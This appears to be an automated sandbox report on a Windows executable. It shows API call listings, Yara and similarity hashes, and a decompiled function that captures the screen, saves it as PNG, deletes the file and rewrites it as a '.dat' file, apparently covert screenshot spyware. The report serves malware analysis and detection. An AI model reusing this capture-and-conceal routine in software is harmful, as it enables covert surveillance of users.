                                            • Part of subcall function 0040DECB: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                            • Part of subcall function 0040DECB: GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                            • Part of subcall function 0040DECB: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                            • Part of subcall function 0040DECB: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                                            • Part of subcall function 0040DECB: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                            • Part of subcall function 0040DECB: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                            • Part of subcall function 0040DECB: ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                            • Part of subcall function 0040DECB: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                            • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                            • Part of subcall function 0040DECB: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015), ref: 0040E3C6
                                          • atoi.MSVCRT ref: 0040E3CD
                                          • Sleep.KERNEL32(00000000), ref: 0040E3DB
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,?,00000000), ref: 0040E3ED
                                          • atoi.MSVCRT ref: 0040E3F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@??4?$basic_string@D@2@@0@D@std@@@std@@Hstd@@V01@V01@@V?$basic_string@$?data@?$basic_string@D@1@@V10@$??2@SleepV12@atoi$??0?$basic_ifstream@?is_open@?$basic_ifstream@?length@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?substr@?$basic_string@?tellg@?$basic_istream@AddressCreateDirectoryGdiplusH@2@H_prologLibraryLoadProcStartupV10@0@V?$fpos@W4seekdir@ios_base@2@@_itoambstowcs
                                          • String ID: .png$dat
                                          • API String ID: 1729542619-928648711
                                          • Opcode ID: 625b0a63cfc6918b55bab22c4974a16ac1eeb50d9241f62e9edcee1b060102b1
                                          • Instruction ID: 2d142cc77db60d4ea9aa91cc9091b160e98ce930e77952c3d99f5e8faa0b95a7
                                          • Opcode Fuzzy Hash: 625b0a63cfc6918b55bab22c4974a16ac1eeb50d9241f62e9edcee1b060102b1
                                          • Instruction Fuzzy Hash: 44715271900109EBCB14ABA1EC5DAEE7B7CAB44305F00847AF506B61A1DFB85E89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNEL32(00002710), ref: 00403AFC
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00403B08
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403B1D
                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00403B24
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00403B35
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00403B3C
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403B50
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000001), ref: 00403B61
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403B6E
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403B7A
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00403B8C
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403B99
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403BA5
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403BB9
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403BC6
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BCF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BE3
                                            • Part of subcall function 0040F44C: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E390,00000001,00000001), ref: 0040F462
                                            • Part of subcall function 0040F44C: ??Bios_base@std@@QBEPAXXZ.MSVCP60(00000000), ref: 0040F487
                                            • Part of subcall function 0040F44C: ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F498
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403BFE
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403C0B
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403C17
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403C2E
                                          • malloc.MSVCRT ref: 00403C3E
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403C51
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 00403C5F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,00000000), ref: 00403C86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403C8F
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C6B
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                            • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                            • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                            • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C9B
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403CAB
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403CB4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403CBE
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001,?,00000000), ref: 00403CDA
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403CE7
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403CF3
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403D00
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403D0A
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 00403D17
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D23
                                          • free.MSVCRT(00000000), ref: 00403D2A
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D37
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D40
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D49
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00403D59
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00403D6D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006), ref: 00403D7C
                                          • SetFileAttributesA.KERNEL32(00000000), ref: 00403D83
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@?data@?$basic_string@?length@?$basic_string@AttributesFileV01@V01@@V12@$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?is_open@?$basic_ofstream@D?$basic_ifstream@D?$basic_ofstream@D@1@@V?$basic_string@$??6std@@??9std@@?close@?$basic_ifstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@?write@?$basic_ostream@Bios_base@std@@D@2@@0@D@2@@0@@D@std@@@0@H@2@SleepV10@V?$basic_ostream@V?$fpos@W4seekdir@ios_base@2@@Y?$basic_string@freemalloc
                                          • String ID:
                                          • API String ID: 3087783639-0
                                          • Opcode ID: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                                          • Instruction ID: e0a08072a2f7578a4e0edfff01c58fb7a8cb1c357dd6a501c8ceff23d305a88f
                                          • Opcode Fuzzy Hash: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                                          • Instruction Fuzzy Hash: 74711A3164011A9BCB15ABA0EC9DAEE7B39AF54305F0081B9F107A61E0DFB45EC9CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 23%
                                          			E0040DECB(signed int __ecx, void* __edx, CHAR* _a4, char _a7) {
                                          				char _v20;
                                          				char _v36;
                                          				void _v60;
                                          				char _v76;
                                          				char _v92;
                                          				char _v108;
                                          				char _v124;
                                          				char _v132;
                                          				void* _v276;
                                          				void* _v416;
                                          				char _v1452;
                                          				long* _t50;
                                          				_Unknown_base(*)()* _t53;
                                          				char* _t61;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				int _t67;
                                          				char* _t73;
                                          				char* _t76;
                                          				signed int _t98;
                                          				int _t134;
                                          				_Unknown_base(*)()* _t141;
                                          
                                          				asm("repne scasb");
                                          				_t134 =  !(__ecx | 0xffffffff) - 1 << 1;
                                          				_t50 = _t134 + _t134;
                                          				_push(_t50);
                                          				L0040FCCC();
                                          				_t128 = _t50;
                                          				mbstowcs(_t50, _a4, _t134);
                                          				_t53 = E0040D71E( &_v36);
                                          				_t141 =  *0x415ab8; // 0x0
                                          				if(_t141 == 0) {
                                          					_t53 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                          					 *0x415ab8 = _t53;
                                          				}
                                          				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t53);
                                          				E0040DD42( &_v92,  *0x415ab8(_t53), 0);
                                          				E0040D999(L"image/png",  &_v108);
                                          				E0040FC2C(E0040E133( &_v108,  &_v92, _t128,  &_v108, 0), _t128);
                                          				_t61 = E00401289(0x415940, _t141, 0x1b);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t61 == 1) {
                                          					__imp__??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_a4, 0x24, 1);
                                          					__imp__?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ();
                                          					if(_t61 != 0) {
                                          						_t63 =  &_v132;
                                          						__imp__?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ(_t63);
                                          						_t98 = 6;
                                          						memcpy( &_v60, _t63, _t98 << 2);
                                          						_t65 = E00405288( &_v60);
                                          						L0040FCCC();
                                          						_t132 = _t65;
                                          						__imp__?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z(0, 0, _t65);
                                          						__imp__?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z(_t65, E00405288( &_v60));
                                          						__imp__?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						_t67 = DeleteFileA(_a4);
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						E004028EB( &_v1452, _t67, _t67);
                                          						E0040FC2C(E00402A2A( &_v1452,  &_v76, _t65, E00405288( &_v60)), _t132);
                                          						_t73 =  &_a7;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_a4, _t73);
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t73 - 3);
                                          						_t76 =  &_v124;
                                          						L0040FC20();
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76,  &_v20, "dat");
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(0x20, 1);
                                          						__imp__??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z(_t76);
                                          						_t61 = E00405288( &_v60);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t61);
                                          						__imp__?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z(_t61);
                                          						__imp__?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						__imp__??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ();
                                          				}
                                          				_t62 = E0040DDA1(_t61,  &_v92);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				return _t62;
                                          			}


























                                          0x0040dedf
                                          0x0040dee6
                                          0x0040dee8
                                          0x0040deeb
                                          0x0040deec
                                          0x0040def2
                                          0x0040def8
                                          0x0040df02
                                          0x0040df0c
                                          0x0040df12
                                          0x0040df22
                                          0x0040df28
                                          0x0040df28
                                          0x0040df30
                                          0x0040df3a
                                          0x0040df4c
                                          0x0040df5a
                                          0x0040df70
                                          0x0040df7d
                                          0x0040df84
                                          0x0040df8d
                                          0x0040dfa0
                                          0x0040dfac
                                          0x0040dfb4
                                          0x0040dfba
                                          0x0040dfc4
                                          0x0040dfce
                                          0x0040dfd2
                                          0x0040dfd7
                                          0x0040dfdd
                                          0x0040dfe3
                                          0x0040dfed
                                          0x0040e003
                                          0x0040e00f
                                          0x0040e018
                                          0x0040e025
                                          0x0040e02e
                                          0x0040e03b
                                          0x0040e05a
                                          0x0040e060
                                          0x0040e06a
                                          0x0040e073
                                          0x0040e080
                                          0x0040e08f
                                          0x0040e093
                                          0x0040e09f
                                          0x0040e0a8
                                          0x0040e0b5
                                          0x0040e0c2
                                          0x0040e0cb
                                          0x0040e0d4
                                          0x0040e0e1
                                          0x0040e0ed
                                          0x0040e0f9
                                          0x0040e102
                                          0x0040e10b
                                          0x0040e10b
                                          0x0040e117
                                          0x0040e117
                                          0x0040e120
                                          0x0040e128
                                          0x0040e132

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                          • mbstowcs.MSVCRT ref: 0040DEF8
                                            • Part of subcall function 0040D71E: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                            • Part of subcall function 0040D71E: CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                            • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                            • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                            • Part of subcall function 0040D71E: CreateCompatibleBitmap.GDI32(00000000,74B06490,00000000), ref: 0040D760
                                            • Part of subcall function 0040D71E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                          • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                          • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                          • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                          • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                                          • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040E003
                                          • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E00F
                                          • DeleteFileA.KERNEL32(0040E3AF,?,?,?,?,00000000), ref: 0040E018
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E025
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040E02E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0040E3AF,?,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040E06A
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E073
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000003,?,?,?,?,00000000), ref: 0040E080
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,dat,?,?,?,?,00000000), ref: 0040E093
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E09F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,00000001,?,?,?,?,?,?,?,00000000), ref: 0040E0B5
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0C2
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0D4
                                          • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0E1
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0ED
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0F9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E102
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E10B
                                          • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E117
                                            • Part of subcall function 0040DDA1: GdipDisposeImage.GDIPLUS(?,0040E125,?,?,?,?,00000000), ref: 0040DDAA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000), ref: 0040E128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$??1?$basic_string@$?c_str@?$basic_string@CreateV12@$??0?$basic_string@??2@?data@?$basic_string@?length@?$basic_string@CapsCompatibleD@1@@Device$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ifstream@?close@?$basic_ofstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?resize@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?tellg@?$basic_istream@?write@?$basic_ostream@AddressBitmapD?$basic_ifstream@D?$basic_ofstream@D@2@@0@DeleteDisposeFileGdipH@2@Hstd@@ImageLibraryLoadProcV01@V01@@V10@V?$basic_string@V?$fpos@W4seekdir@ios_base@2@@mbstowcs
                                          • String ID: Shlwapi.dll$dat$image/png
                                          • API String ID: 3855994960-268849978
                                          • Opcode ID: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                                          • Instruction ID: 50900ce0a1674e933a04bd46031eee92378d76cf936f2abeadaca34bfabdd0a9
                                          • Opcode Fuzzy Hash: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                                          • Instruction Fuzzy Hash: 1161E972900119AFCB15ABA0EC9D9EE7B78FF54305F0045BAF506A60A0DFB45A89CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 00401CD1
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401CE0
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
